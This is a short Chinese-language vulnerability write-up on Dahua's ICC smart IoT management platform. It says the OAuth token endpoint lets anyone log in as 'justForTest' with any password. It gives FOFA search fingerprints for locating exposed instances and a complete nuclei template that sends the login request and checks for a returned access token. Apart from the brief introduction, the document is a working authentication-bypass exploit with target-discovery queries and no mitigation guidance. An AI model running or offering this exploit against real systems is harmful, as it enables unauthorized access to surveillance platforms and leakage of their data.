0x01 产品简介
浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商。
0x02 漏洞概述
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞,使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
0x03 影响范围
大华智能物联综合管理平台
0x04 复现环境
fofa
icon_hash="-1935899595"
body="*客户端会小于800*"
0x05 漏洞复现
nuclei脚本
id: dahua-icc-oauth
info:
name: 大华智能物联综合管理平台存在逻辑漏洞,可任意用户登录
author: xxx
severity: high
description: |
大华ICC智能物联综合管理平台存在逻辑漏洞,可任意用户登录。
tags: 2023,dahua
metadata:
max-request: 2
fofa-query: body="*客户端会小于800*"
verified: true
requests:
- raw:
- |
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains(body,"access_token")'